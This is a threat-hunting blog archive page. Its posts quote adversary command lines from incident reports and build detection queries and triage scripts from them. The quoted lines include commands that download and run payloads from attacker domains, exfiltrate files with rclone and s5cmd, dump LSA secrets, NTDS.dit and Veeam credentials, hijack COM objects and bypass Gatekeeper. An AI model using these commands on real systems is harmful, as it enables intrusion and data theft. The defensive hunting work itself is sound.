Posts

Showing posts from August, 2025

243. NetSupport RAT: The Most Prevalent Threat of August 2025

Hello everyone! Remote Access Tools (T1219) is still a very common technique observed in many campaigns and incidents. According to Red Canary's Intelligence Insights for August 2025, the most prevalent threat was NetSupport RAT, so let's look at various detection opportunities.

As always, adversaries may rename executables, so we can search for renamed NetSupport executables by comparing the file's version metadata with its name:

event_type: "processcreatewin" AND proc_file_productname: "netsupport" AND NOT proc_file_path: "client32.exe"

Keep in mind that the version info fields are fully under the adversary's control and can be stripped or forged, so this catches lazy renaming only.

Next, a legitimately installed NetSupport client normally starts from the Program Files directory, so we can search for it running from other folders:

event_type: "processcreatewin" AND proc_file_path: "client32.exe" AND NOT proc_file_path: "program files"

Finally, we can look for network indicators. DNS queries for the vendor's domain should be rare in an environment that does not use NetSupport:

event_type: "dnsreqwin" AND dns_rname: "netsupportsoftware.com"

See you tomorrow!

242. Can Msiexec Install a PDF file?

Hello everyone! Another useful idea for threat hunting is searching for unusual file types executed via system binaries as part of the System Binary Proxy Execution (T1218) technique. Yesterday Huntress blogged about a curious example of the FileFix technique used by an adversary to deliver and execute MetaStealer. As part of the kill chain, the victim runs an LNK file, which executes the following command:

%comspec% /k "start msedge hXXps://anydesk[.]com/en/downloads/windowslatest & curl -sLo %TEMP%\%COMPUTERNAME%6.pdf hXXps://%COMPUTERNAME%6.chat1[.]store/update/6.pdf & msiexec /i %TEMP%\%COMPUTERNAME%6.pdf /qn & taskkill /f /im cmd.exe"

And what do we see here? The real AnyDesk download page is opened as a decoy, the payload is fetched with curl, and then the adversary uses msiexec.exe to "install" a PDF file (which is actually an MSI installer, of course). msiexec does not care about the extension: it parses whatever file it is given as an MSI database, so the .pdf name is purely a lure for the user and a blind spot for extension-based controls. And we can hunt for similar behaviors:

event_type: "processcreatewin" AND proc_file_name: "msiexec.exe" AND cmdline: *pdf

See you tomorrow!
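As an added example for this post (not code from Huntress or from the original article), here is the triage step a responder would run on the file msiexec was pointed at: an MSI is a Compound File Binary (OLE2) container with a fixed 8-byte signature, a PDF starts with "%PDF-", so the extension's claim can be checked against the content without opening anything. The file names and bytes below are constructed, not real samples.

```python
"""Is this "PDF" really a PDF? Telling MSI from PDF by content, not by name.

msiexec parses whatever file it is handed as an MSI database, so a payload
called 6.pdf installs just fine. Comparing the claimed type (from the
extension) with the real one (from the magic bytes) is a cheap triage step
for anything msiexec touched. All sample bytes and names are constructed.
"""
import os

# Well-known magic numbers.
CFB_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # OLE2 / Compound File Binary: MSI, MSP, legacy Office
PDF_MAGIC = b"%PDF-"

# What a given extension claims the content is.
EXT_CLAIMS = {".pdf": "pdf", ".msi": "cfb", ".msp": "cfb", ".doc": "cfb", ".xls": "cfb"}


def classify(data: bytes) -> str:
    """Return 'cfb', 'pdf' or 'unknown' based on the leading bytes."""
    if data.startswith(CFB_MAGIC):
        return "cfb"
    if data.startswith(PDF_MAGIC):
        return "pdf"
    return "unknown"


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the extension claims one known format and the bytes show another.

    Unknown extensions and unknown content are not reported: the point is the
    contradiction, not every odd file.
    """
    claimed = EXT_CLAIMS.get(os.path.splitext(filename)[1].lower())
    actual = classify(data)
    return claimed is not None and actual != "unknown" and claimed != actual


def triage(files: dict) -> list:
    """Return the names of files whose extension lies about their content, sorted."""
    return sorted(name for name, data in files.items() if extension_mismatch(name, data))


# Constructed samples: a staged "PDF" carrying an MSI header (what the FileFix
# chain would leave in %TEMP%), a real PDF header, a real MSI, and a text file
# (no claim, so never reported).
SAMPLES = {
    "WS01-6.pdf": CFB_MAGIC + b"\x00" * 504,
    "invoice.pdf": b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n",
    "setup.msi": CFB_MAGIC + b"\x00" * 504,
    "readme.txt": b"nothing to see here\n",
}

if __name__ == "__main__":
    for name in triage(SAMPLES):
        ext = os.path.splitext(name)[1].lower()
        print(f"{name}: extension says {EXT_CLAIMS[ext]}, content is {classify(SAMPLES[name])}")
```

Run it against the files referenced in msiexec command lines from your telemetry; the same check extends to any other proxy-execution binary that ignores extensions.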

241. That's How Lazarus Adopted ClickFix and How to Hunt It

Hello everyone! The ClickFix technique is becoming more and more popular, and is now part of the arsenal of even state-sponsored adversaries. Today we'll look at how Lazarus (or Lazer Werewolf) leverages this technique, and extract hunting opportunities. So, the adversary used the following command:

curl -k -o "%TEMP%\nvidiaRelease.zip" hXXps://driverservices[.]store/visiodrive/nvidiaRelease.zip && powershell -Command "Expand-Archive -Force -Path '%TEMP%\nvidiaRelease.zip' -DestinationPath '%TEMP%\nvidiaRelease'" && wscript "%TEMP%\nvidiaRelease\run.vbs"

Here we have at least three hunting opportunities. The first one: using cURL to download a file to a temp folder. I included the arguments used by the threat actors (-k ignores TLS certificate errors; -o specifies the output file path):

event_type: "processcreatewin" AND proc_file_path: "curl.exe" AND cmdline: ("k" AND "o" AND "temp"...

240. Adversaries Abuse Enterprise Incident Response Tools

Hello everyone! We already talked about abusing forensic and incident response tools. Let's look at a curious example of how adversaries leverage such software instead of Remote Access Tools (T1219). According to a Sophos report, an adversary leveraged Velociraptor, which was configured to communicate with the C2 server velo[.]qaubctgg[.]workers[.]dev. Yes, you may even use Velociraptor in your environment, but it's unlikely to be configured to communicate with a workers[.]dev domain (Cloudflare Workers, where anyone can register a free subdomain). And we can use it to build the query:

event_type: "dnsreqwin" AND dns_rname: "workers.dev" AND proc_file_path: "velociraptor.exe"

As with any tool, the binary may be renamed, so pair this with a check on file metadata rather than relying on the file name alone.

See you tomorrow!

239. That's How Adversaries Abuse PowerShell for Component Object Model Hijacking

Hello everyone! Do you remember that PowerShell has an almost countless number of procedures? So today we'll look at another one, which includes the following technique: Event Triggered Execution: Component Object Model Hijacking (T1546.015). This time the example we are going to look at belongs to Head Mare (or Rainbow Hyena). One more time the adversary leveraged malicious LNK files in order to execute the following PowerShell command:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -c "New-Item -Path 'HKCU:\Software\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InprocServer32' -Force|Set-Item -Value 'C:\ProgramData\winnt64_.dll';$r=[System.IO.Path]::Combine($(gl).Path,'Задание_на_оценку_N_2046_от_05_августа_2025_года.zip');if(Test-Path $r){[System.IO.File]::WriteAllBytes([System.IO.Path]::Combine($env:ProgramData,'winnt64_.dll'),([System.IO.File]::ReadAllBytes($r)|select -Skip 16 -First 642064));}el...

238. LOLBAS ITW: Extensible Wizards Host Process

Hello everyone! There are lots of LOLBAS, but are all of them used in the wild? Let's look at how real adversaries abuse Extensible Wizards Host Process (xwizard.exe) for Ingress Tool Transfer (T1105). So, Extensible Wizards Host Process can be used by adversaries to download a malicious file from a remote server. Here's an example related to FormBook:

XwIZarD.exe RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z hXXps://gbuarts[.]com/cc/Protected.exe

Note the mixed-case file name: Windows paths are case-insensitive, so it changes nothing for the OS, but it can slip past detections that compare strings case-sensitively. For example, we can look for xwizard.exe executions with "http" among the command line parameters:

event_type: "processcreatewin" AND proc_file_path: "XwIZarD.exe" AND cmdline: *http*

See you tomorrow!

237. That's How Adversaries Abuse Expand.exe

Hello everyone! In many cases adversaries deobfuscate or decode downloaded or dropped payloads. Of course, they often use LOLBAS for it. So let's look at an example of Deobfuscate/Decode Files or Information (T1140). As always, we need some procedure examples, and we'll extract them from this report on Ghostwriter. Here are a few examples of how the threat actors abuse expand.exe:

"C:\Windows\System32\expand.exe" "C:\Users\<USER>\AppData\Local\Temp\sdw9gobh0n" "C:\Users\<USER>\AppData\Local\Logs\sdw9gobh0n.log"

"%windir%\System32\expand.exe" %ProgramData%\OfficeRuntimeBroker.xlam %ProgramData%\~OfficeRuntimeBroker.dat

expand.exe works on the file content, not the extension, so a CAB archive can travel under any name (here an .xlam and a file with no extension at all). Usually it's used with CAB files, so we can search for executions without this file type among the command line arguments:

event_type: "processcreatewin" AND proc_file_path: "expand.exe" AND NOT cmdline: *cab

Tune it based on your own telemetry! For example, you may also need to...

236. That's How SHAMOS Bypasses Gatekeeper Checks

Hello everyone! Let's talk a bit about defense evasion. But not on Windows. And not on Linux. Today we're going to look at a procedure related to the following technique: Subvert Trust Controls: Gatekeeper Bypass (T1553.001). And we'll look at SHAMOS, a variant of Atomic macOS Stealer (AMOS). To bypass Gatekeeper checks, it clears all extended attributes of the downloaded payload with xattr, including com.apple.quarantine, the attribute Gatekeeper relies on to decide that a file needs to be checked (sudo -S reads the password from standard input, which is what lets a pasted one-liner run it):

sudo -S xattr -c /tmp/update

We can hunt for clearing attributes of suspicious files located under /tmp:

event_type: "processcreatemac" AND proc_file_path: "xattr" AND cmdline: ("c" AND "tmp")

See you tomorrow!

235. Adversaries Abuse Msiexec as a Part of ClickFix

Hello everyone! There are lots of legitimate binaries used by threat actors as a part of ClickFix. PowerShell, Windows Command Shell, mshta... But today we'll look at the following technique: System Binary Proxy Execution: Msiexec (T1218.007). This time the adversary abused msiexec to install NetSupport RAT on the compromised system straight from a URL (msiexec accepts a URL as the package path natively):

msiexec /i hXXps://cf-2-up[.]com/res/skirthub /qn 87af19ba=a296378a+606fc0b0*05a130cd(980b6676^174d7ea5*b01eaa45

For example, we can look for msiexec installing files without the .msi extension from a remote server:

event_type: "processcreatewin" AND proc_file_path: "msiexec.exe" AND cmdline: *http* AND NOT cmdline: *msi*

One caveat: if your cmdline field includes the image name, *msi* also matches "msiexec" and the exclusion suppresses everything, so exclude the extension more precisely (for example *.msi*) in that case.

See you tomorrow!

234. That's How MountBot Hides Its Processes

Hello everyone! Adversaries always want to hide their malicious activities. Some hiding techniques are common, while others are not. Let's look at one of them: Hide Artifacts: Bind Mounts (T1564.013). According to this report, MountBot has the following code:

mount('/proc/1', '/proc/self', 0, MS_BIND, 0);

This bind-mounts the /proc directory of PID 1 over the malware's own /proc/<pid> directory, so anything that enumerates processes by reading /proc (ps, top, many agents) sees init's details in place of the malware's. And this is an example of how adversaries abuse bind mounts on file structures to hide their activity! Of course, we can hunt for suspicious executions of mount:

event_type: "processcreatenix" AND proc_file_path: "mount" AND cmdline: ("bind" AND "proc")

Keep in mind that the code above is a direct syscall, not a run of the mount binary, so it produces no process creation event. The query catches the command line variant (mount --bind /proc/1 /proc/<pid>); the syscall variant needs syscall-level telemetry (auditd, eBPF) or a look at the mount table itself in /proc/self/mountinfo.

See you tomorrow!
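What the kernel cannot hide is the mount itself: it shows up in /proc/self/mountinfo as a procfs entry whose root is /1 and whose mount point is /proc/<pid>, whereas a genuine procfs mount has root "/" and mount point /proc. The following is an added example for this post (not MountBot's code and not the blog's query) that parses mountinfo and reports such overlays; the mount table below is constructed, and on Linux the script reads the live file instead.

```python
"""Spot processes hidden by a procfs bind mount over their /proc/<pid> directory.

mountinfo line layout (see proc(5)):
  <id> <parent> <maj:min> <root> <mount point> <opts> [optional...] - <fstype> <source> <super opts>
"""
import re
import sys

PID_MOUNT = re.compile(r"^/proc/(\d+)(?:/|$)")
PID_ROOT = re.compile(r"^/(\d+)(?:/|$)")


def unescape_field(field: str) -> str:
    """mountinfo escapes space, tab, newline and backslash as \\ooo octal sequences."""
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), field)


def parse_mountinfo(text: str) -> list:
    """Parse /proc/self/mountinfo into dicts; malformed or blank lines are skipped."""
    entries = []
    for line in text.splitlines():
        pre, sep, post = line.partition(" - ")
        head, tail = pre.split(), post.split()
        if not sep or len(head) < 6 or len(tail) < 2:
            continue
        entries.append({
            "mount_id": int(head[0]),
            "parent_id": int(head[1]),
            "root": unescape_field(head[3]),
            "mount_point": unescape_field(head[4]),
            "fstype": tail[0],
            "source": tail[1],
        })
    return entries


def find_proc_overlays(entries: list) -> list:
    """Return [{hidden_pid, shown_pid, mount_id}] for procfs mounts stacked on /proc/<pid>."""
    hits = []
    for e in entries:
        if e["fstype"] != "proc":
            continue
        target = PID_MOUNT.match(e["mount_point"])
        if not target:
            continue
        source = PID_ROOT.match(e["root"])
        hits.append({
            "hidden_pid": int(target.group(1)),
            # the directory now shown in its place; None if the root is not /<pid>
            "shown_pid": int(source.group(1)) if source else None,
            "mount_id": e["mount_id"],
        })
    return hits


# Constructed mount table: a normal root, /proc and /sys, plus the MountBot-style
# overlay of PID 1's directory over the malware's own PID 4242.
SAMPLE_MOUNTINFO = """\
24 1 8:1 / / rw,relatime shared:1 - ext4 /dev/sda1 rw,errors=remount-ro
22 24 0:21 / /proc rw,nosuid,nodev,noexec,relatime shared:12 - proc proc rw
23 24 0:22 / /sys rw,nosuid,nodev,noexec,relatime shared:7 - sysfs sysfs rw
81 22 0:21 /1 /proc/4242 rw,nosuid,nodev,noexec,relatime shared:12 - proc proc rw
"""

if __name__ == "__main__":
    try:
        with open("/proc/self/mountinfo") as fh:   # live table on Linux
            text = fh.read()
    except OSError:
        text = SAMPLE_MOUNTINFO                     # anywhere else, the constructed sample
    hits = find_proc_overlays(parse_mountinfo(text))
    for hit in hits:
        print("PID %(hidden_pid)s is masked by /proc/%(shown_pid)s (mount id %(mount_id)s)" % hit)
    sys.exit(1 if hits else 0)
```

Run it from a process in the same mount namespace as the suspect (on a plain host, any root shell); a hit tells you which PID to inspect from outside the namespace, for example via a different mount namespace or the kernel's own view with `ls -l /proc/<pid>/exe` after unmounting the overlay.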

233. Another Tool - Same Detection Opportunity

Hello everyone! Yesterday we looked at how the Qilin ransomware gang abused s5cmd to exfiltrate sensitive data from compromised systems. Today we'll look at another example to understand that the same detections may be applied to various cases. This time we'll look at another very popular tool for data exfiltration: rclone. Here's how Warlock used this tool (note the renamed binary):

TrendSecurity[.]exe copy \\{UNC Path}\ mydrive:/client_42 --protondrive-username [Email] --protondrive-password [Password] -P --include "*.{txt,pdf,csv,accdb,doc,docx,xlsx,mdf,sql,doc,xls,sql,jpg,png,jpeg,sqlite,db,sqlite3,sdf,ndf,ldf,csv,mdf,dbf,ibd,myd,ppt,pptx}" -q --ignore-existing --auto-confirm --multi-thread-streams 11 --transfers 11 --max-age 200d --max-size 3000m

As you can see, here we have very similar command line arguments, so we can use the same query, which keys on the arguments rather than on a file name that is trivially changed:

event_type: "processcreatewin" AND cmdline: ("include" AND "pdf" AND "xls" AND "doc")

See you tom...

232. Qilin Ransomware Gang Abuses S5cmd for Data Exfiltration

Hello everyone! Data exfiltration. Almost every ransomware-related incident includes this stage. And adversaries often experiment with various free tools to evade defenses. Today we're going to talk about the following technique: Transfer Data to Cloud Account (T1537). Huntress noted that in a recent Qilin ransomware attack the adversary used s5cmd for exfiltration:

s5cmd --credentials-file credentials cp --include "*.pdf" --include "*.png" --include "*.jpg" --include "*.jpeg" --include "*.xls" --include "*.xlsx" --include "*.tif" --include "*.zip" --include "*.doc" --include "*.docx" "[Folder]" s3://[Resource]

For detection, we can use, for example, the popular file types selected on the command line:

event_type: "processcreatewin" AND cmdline: ("include" AND "pdf" AND "xls" AND "doc")

See you tomorrow!
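Both this post and the previous one (Warlock's renamed rclone) hunt on the same flag, but the two tools spell it differently: rclone usually gets one brace list ("*.{txt,pdf,csv}"), s5cmd gets --include once per type. As an added example for both posts (not the blog's query and not either tool's code), the script below normalizes both forms into one set of extensions so a single rule can score any command line instead of matching four hard-coded words. The command lines are constructed after the two reports, with placeholders for paths and credentials.

```python
"""Normalize rclone and s5cmd --include patterns into one set of file types."""
import re
import shlex

# Document and database types ransomware crews routinely sweep up.
SENSITIVE_EXTS = {
    "txt", "pdf", "csv", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "accdb",
    "mdf", "ndf", "ldf", "sql", "db", "sqlite", "sqlite3", "sdf", "dbf", "ibd", "myd",
    "zip", "jpg", "jpeg", "png", "tif",
}
BRACE_LIST = re.compile(r"^\*\.\{([^}]+)\}$")   # *.{a,b,c}
SINGLE_EXT = re.compile(r"^\*\.(\w+)$")         # *.a


def include_patterns(cmdline: str) -> list:
    """Return every --include value, given either as '--include X' or '--include=X'.

    posix=False keeps Windows backslashes intact; surrounding quotes are stripped by hand.
    """
    tokens = [t.strip('"\'') for t in shlex.split(cmdline, posix=False)]
    values = []
    for i, tok in enumerate(tokens):
        if tok.startswith("--include="):
            values.append(tok.split("=", 1)[1].strip('"\''))
        elif tok == "--include" and i + 1 < len(tokens):
            values.append(tokens[i + 1])
    return values


def pattern_extensions(pattern: str) -> set:
    """Expand one glob into lower-cased extensions; shapes we don't model yield nothing."""
    m = BRACE_LIST.match(pattern)
    if m:
        return {p.strip().lower() for p in m.group(1).split(",") if p.strip()}
    m = SINGLE_EXT.match(pattern)
    return {m.group(1).lower()} if m else set()


def sensitive_extensions(cmdline: str) -> set:
    """Sensitive file types a command line explicitly selects for transfer."""
    exts = set()
    for pat in include_patterns(cmdline):
        exts |= pattern_extensions(pat)
    return exts & SENSITIVE_EXTS


def hunt_exfil(events: list, threshold: int = 4) -> dict:
    """Return {event_id: sorted extensions} for command lines selecting >= threshold sensitive types."""
    hits = {}
    for ev in events:
        found = sensitive_extensions(ev["cmdline"])
        if len(found) >= threshold:
            hits[ev["id"]] = sorted(found)
    return hits


# Constructed command lines modelled on the Warlock and Qilin reports, plus two benign ones.
EVENTS = [
    {"id": "warlock-rclone", "cmdline":
        r'TrendSecurity.exe copy \\FS01\Shares\ mydrive:/client_42 --protondrive-username user@example.invalid '
        r'--protondrive-password REDACTED -P --include "*.{txt,pdf,csv,accdb,doc,docx,xlsx,mdf,sql,xls,jpg,png}" '
        r'-q --ignore-existing --auto-confirm --multi-thread-streams 11 --transfers 11 --max-age 200d --max-size 3000m'},
    {"id": "qilin-s5cmd", "cmdline":
        r's5cmd --credentials-file credentials cp --include "*.pdf" --include "*.png" --include "*.jpg" '
        r'--include "*.xls" --include "*.xlsx" --include "*.doc" --include "*.docx" "D:\Finance" s3://bucket-name/'},
    {"id": "admin-backup", "cmdline":
        r'rclone sync D:\Backups gdrive:offsite --include "*.bak" --include "*.vbk" --bwlimit 10M'},
    {"id": "robocopy", "cmdline": r'robocopy D:\Data E:\Mirror /MIR /R:1'},
]

if __name__ == "__main__":
    for event_id, exts in hunt_exfil(EVENTS).items():
        print(event_id, "selects", ", ".join(exts))
```

The threshold is the tuning knob: a backup job that includes two database types is normal, a job that selects a dozen document and database types at once, regardless of which binary runs it, is the pattern in both reports.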

231. Adversaries Use Paste[.]rs to Host Stealer Payloads

Hello everyone! Nowadays adversaries often abuse Telegram as a C2 channel. But in some cases it's even more interesting. Today we'll talk about the following technique: Web Service: Dead Drop Resolver (T1102.001). And we'll look at a stealer with a quite funny name: Noodlophile. The adversary leveraged scripts which extracted a part of a URL from the description of a Telegram group, for example "Gc2BJ". To store the payload the threat actors used paste[.]rs, so the final URL would be hXXps://paste[.]rs/Gc2BJ. So, why not hunt for suspicious connections to paste[.]rs?

event_type: "dnsreq" AND dns_rname: "paste.rs"

See you tomorrow!

230. Scaly Wolf Abuses BITSAdmin for Ingress Tool Transfer

Hello everyone! Adversaries always abuse legitimate utilities, for example curl and wget, to download malware and tools to the compromised system. But today we'll look at a rarer tool used for Ingress Tool Transfer (T1105). I'm talking about BITSAdmin. I don't see it used by adversaries very often, but still there are a few examples. One of them: Scaly Wolf. The threat actors leveraged BITSAdmin to download a Meterpreter loader:

powershell -Command "bitsadmin /transfer "DownloadJob" "hxxps[:]//roscosmosmeet[.]online/shellcode.exe" "$env:USERPROFILE\Pictures\zabix.exe""

As it's not commonly used, we can hunt for BITSAdmin executions with the /transfer argument:

event_type: "processcreatewin" AND proc_file_path: "bitsadmin.exe" AND cmdline: "transfer"

BITS also keeps its own record: the Microsoft-Windows-Bits-Client/Operational event log notes each job with its URL (event IDs 59 and 60), which helps when process telemetry is missing.

See you tomorrow!

229. That's How UAT-7237 Interacts with Windows Registry

Hello everyone! The Windows Registry contains lots of sensitive information and configurations, so adversaries often interact with it. Today we'll look at two examples! And we'll extract both procedures from this report. The first technique is Modify Registry (T1112). The adversary used it to disable the User Account Control (UAC) remote restriction for local accounts, so that a local administrator's credentials (or hash) can be used for remote administration over the network:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

We can build detection based on reg.exe abuse or just on the value modification itself:

event_type: "registryvalueset" AND reg_key_path: "LocalAccountTokenFilterPolicy" AND reg_value_data: "0x00000001"

The second technique: Unsecured Credentials: Credentials in Registry (T1552.002). The adversary queried the Registry to obtain VNC credentials:

reg query "HKCU\Software\ORL\WinVNC3\Password"

Let's build the detection based on reg.exe abuse this time:

event_type: "processcr...

228. That's How Adversaries Abuse WMI for Discovery

Hello everyone! Discovery is a perfect attack stage for your threat hunting mission! And today we'll look at how adversaries abuse wmic to collect system information: Windows Management Instrumentation (T1047). If we look at behaviors related to KiwiStealer, we can see that it executes multiple discovery commands with wmic:

wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName
wmic cpu get name
wmic csproduct get name
wmic nic where NetEnabled=true get MACAddress
wmic os get caption

As you can see, the adversary collects information about antivirus software, CPU, device model, network adapters and operating system. Let's use all of this to build a hunting query:

event_type: "processcreatewin" AND proc_file_path: "wmic.exe" AND cmdline: ("AntiVirusProduct get displayName" OR "cpu get name" OR "csproduct get name" OR "get MACAddress" OR "os get caption")

It may be (very) noisy, but proper...

227. Ransomware Gangs Patch System DLL to Enable Multiple Simultaneous RDP Connections

Hello everyone! I'm sure you know that adversaries LOVE RDP. In most cases they use it for lateral movement. Today we'll look at the following technique: Server Software Component: Terminal Services DLL (T1505.005). According to this report on the Crypto24 ransomware group, the adversary patched termsrv.dll to enable multiple simultaneous RDP connections. The threat actor also executed the following commands related to the DLL:

takeown.exe /F C:\Windows\System32\termsrv.dll /A
icacls.exe C:\Windows\System32\termsrv.dll /grant Administrators

These are needed because termsrv.dll, like the rest of System32, is owned by TrustedInstaller and cannot be overwritten by an administrator without first taking ownership. We can use it to build detection logic:

event_type: "processcreatewin" AND proc_file_path: ("takeown.exe" OR "icacls.exe") AND cmdline: "termsrv.dll"

We can also hunt for file modification events related to termsrv.dll; outside of Windows Update, nothing should write to it:

event_type: "filewrite" AND file_path: "termsrv.dll"

See you tomorrow!

226. That's How Adversaries Extract Credentials From Registry

Hello everyone! Let's look at another technique I don't see used ITW often. This time it's OS Credential Dumping: LSA Secrets (T1003.004). I rarely do this, but we'll look into the same report as yesterday. The adversary leveraged multiple commands to extract credentials, including the following:

cmd.exe /C reg query HKLM\\Security\\Policy\\Secrets\\_SC_MSSQLSERVER\\CurrVal > C:\\Windows\\Temp\\KQPGjxdB.tmp 2>&1
cmd.exe /C reg query HKLM\\Security\\Policy\\Secrets\\_SC_MSSQLSERVER > C:\\Windows\\Temp\\AVFVmJxu.tmp 2>&1
cmd.exe /C reg query HKLM\\Security\\Policy\\Secrets > C:\\Windows\\Temp\\UHopbQrR.tmp 2>&1

Yes, the adversary abused reg.exe to extract LSA secrets from the registry, here the _SC_<service> entries that hold service account passwords. Note that the HKLM\SECURITY hive is readable only by SYSTEM by default, so a successful query like this means the adversary was already running as SYSTEM (or had re-ACLed the key). So, we can hunt for similar behavior:

event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: "Security\\Policy\\Secrets"

See you tomorrow!

225. MucorAgent Uses Component Object Model Hijacking for Persistence

Hello everyone! I think everyone is tired of common persistence mechanisms. Startup folder, Run key, scheduled tasks, services... Let's look at something more interesting: Event Triggered Execution: Component Object Model Hijacking (T1546.015). As always, we need a real-world example. And I got one for you: MucorAgent. The malware abuses reg.exe to modify the registry and hijack the CLSID, pointing InprocServer32 at mscoree.dll (the .NET runtime host) so that the Assembly and Class values name the managed code to load:

reg add HKEY_USERS\<SID>\SOFTWARE\Classes\CLSID\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\InprocServer32 /t REG_SZ /d "C:\\Windows\\System32\\mscoree.dll" /F
reg add HKEY_USERS\<SID>\SOFTWARE\Classes\CLSID\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\InprocServer32 /v Assembly /t REG_SZ /d "TaskLauncher, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" /F
reg add HKEY_USERS\<SID>\SOFTWARE\Classes\CLSID\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\InprocServer32 /v Class /t REG_SZ /d "TaskLauncher.TaskHandler" /F
reg add HKEY_USERS\<SID>\SOFTWARE\C...

224. Another Tool for Data Exfiltration: Restic

Hello everyone! Ransomware gangs often collect and exfiltrate sensitive data from compromised systems to use it for double extortion. So let's talk about the following technique: Exfiltration Over Web Service: Exfiltration to Cloud Storage (T1567.002). Threat actors can use various web services, for example gofile[.]io, or legitimate backup tools; I think everyone has seen at least one attack description with rclone in it. To evade detection, adversaries need to change their tool from time to time, and in some cases they approach it in an original way. For example, the Noberus ransomware gang leveraged Restic, another legitimate backup tool:

CSIDL_COMMON_VIDEO\restic.exe -r rest:http://[REMOVED]:8000/ init [REMOVED] CSIDL_COMMON_VIDEO\ppp.txt
CSIDL_COMMON_VIDEO\restic.exe -r rest:http://[REMOVED]:8000/ [REMOVED] CSIDL_COMMON_VIDEO\ppp.txt --use-fs-snapshot --verbose backup "CSIDL_SYSTEM_DRIVE\[REMOVED]"

The tool doesn't have lots of metadata, but you still can use uniq...

223. Akira Abuses Wbadmin to Obtain a Copy of NTDS.dit

Hello everyone! Today the technique we are going to look at is OS Credential Dumping: NTDS (T1003.003). I'm sure you've seen adversaries abuse esentutl to get a copy of NTDS.dit, but what about wbadmin? I think you've seen lots of reports on Akira ransomware attacks involving SonicWall recently. According to this report, the adversary leveraged wbadmin to dump NTDS.dit as well as the SYSTEM and SECURITY registry hives (the SYSTEM hive holds the boot key needed to decrypt the hashes):

"C:\Windows\system32\wbadmin.exe" start backup -backupTarget:\\localhost\c$\ProgramData\ -include:C:\Windows\NTDS\NTDS.dit C:\Windows\System32\config\SYSTEM C:\Windows\System32\config\SECURITY -quiet

wbadmin goes through the Volume Shadow Copy Service, which is what lets it copy files that are locked while the domain controller is running. If we want to look for NTDS.dit dumping attempts, we can run the following query:

event_type: "processcreatewin" AND proc_file_path: "wbadmin.exe" AND cmdline: "ntds.dit"

See you tomorrow!

222. That's How Adversaries Abuse PowerShell to Take Screenshots Quietly

Hello everyone! We haven't talked about abusing PowerShell for some time. But let's do it again today, as I spotted an interesting example. And we'll look at the following technique: Screen Capture (T1113). Let's look at the Efimer Trojan described in this report. The malware uses the following PowerShell command to capture screenshots (the command is assembled inside the trojan's script, which is why JavaScript string concatenation shows through at the end):

powershell.exe -NoProfile -WindowStyle Hidden -Command "$scale = 1.25; Add-Type -AssemblyName System.Drawing; Add-Type -AssemblyName System.Windows.Forms; $sw = [System.Windows.Forms.SystemInformation]::VirtualScreen.Width; $sh = [System.Windows.Forms.SystemInformation]::VirtualScreen.Height; $w = [int]($sw * $scale); $h = [int]($sh * $scale); $bmp = New-Object Drawing.Bitmap $w, $h; $g = [Drawing.Graphics]::FromImage($bmp); $g.ScaleTransform($scale, $scale); $g.CopyFromScreen(0, 0, 0, 0, $bmp.Size); $bmp.Save(\'' + path.replace(/\\/g, '\\\\') + '\', [Drawing.Imaging.ImageFormat]::Png); ' + '$g.Dispo...

221. Adversaries Abuse Lua to Load Stealers

Hello everyone! Command and Scripting Interpreter (T1059) is an extremely popular technique. As you know, adversaries most often use Windows Command Shell (T1059.003) and PowerShell (T1059.001). But in some cases we can observe more interesting interpreters. For example, according to this report on SmartLoader, the adversary abused Lua (T1059.011) to run obfuscated malicious scripts. The threat actors distributed archives via GitHub repositories. Each archive contained a LuaJIT executable and its DLL, an obfuscated malicious Lua script and a batch file to run it. If you look through the archives, you can see that the DLL is named lua51.dll in all cases, so we use it for our hunting query:

event_type: "imageload" AND file_path: "lua51.dll"

lua51.dll is the standard name of the LuaJIT runtime library, so legitimate software that embeds LuaJIT loads it too; baseline the loading processes and paths before alerting on it.

See you tomorrow!

220. Adversaries Use TokenUtils to Escalate Privileges

Hello everyone! Today we'll talk about privilege escalation, and focus on the Access Token Manipulation (T1134) technique. As always, we need a real life example, right? Let's look into this report. The adversary leveraged TokenUtils to list the tokens of all logged-on users and use those to execute commands with elevated privileges:

TokenUtils.exe ListTokens
TokenUtils.exe Execute -u "NT AUTHORITY\SYSTEM" -e whoami -c
TokenUtils.exe Execute -u "NT AUTHORITY\SYSTEM" -e cmd.exe -c

To hunt for the tool's usage we can use, for example, the module name:

event_type: "processcreatewin" AND cmdline: "ListTokens"

See you tomorrow!

219. That's How Ransomware Gangs Obtain Credentials for Backup Servers

Hello everyone! Backups. One of the main targets of any ransomware gang. They can use them to inhibit recovery or to obtain sensitive data. But before that, they need to obtain access to this part of the infrastructure. The DFIR Report shared details on an Akira ransomware intrusion. To obtain credentials from the Veeam server, the adversary used the PostgreSQL interactive terminal to dump credentials from the Veeam PostgreSQL database:

psql.exe -U postgres --csv -d VeeamBackup -w -c "SELECT user_name,password,description,change_time_utc FROM credentials"

For example, we can hunt for attempts to access the credentials table:

event_type: "processcreatewin" AND proc_file_productname: "postgresql" AND cmdline: "credentials"

See you tomorrow!

218. Adversaries Abuse .Desktop Files to Attack Linux Systems

Hello everyone! Using phishing emails to obtain initial access to a Windows host is quite a common technique. And we see such emails every day. But what about Linux? Let's look at an example! According to this report, APT36 leveraged malicious .desktop files to deliver Poseidon, a Mythic agent. These files were masqueraded to look like PDF documents, for example Document Details.pdf.desktop. In fact, such files are the Linux desktop equivalent of shortcut files: plain text entries whose Exec= line is run when the user double-clicks the icon, so a "document" can quietly launch a downloader. If you have Linux workstations, it's a good idea to hunt for suspicious .desktop files:

event_type: "processcreatenix" AND cmdline.keyword: /.*\.desktop\s.*/

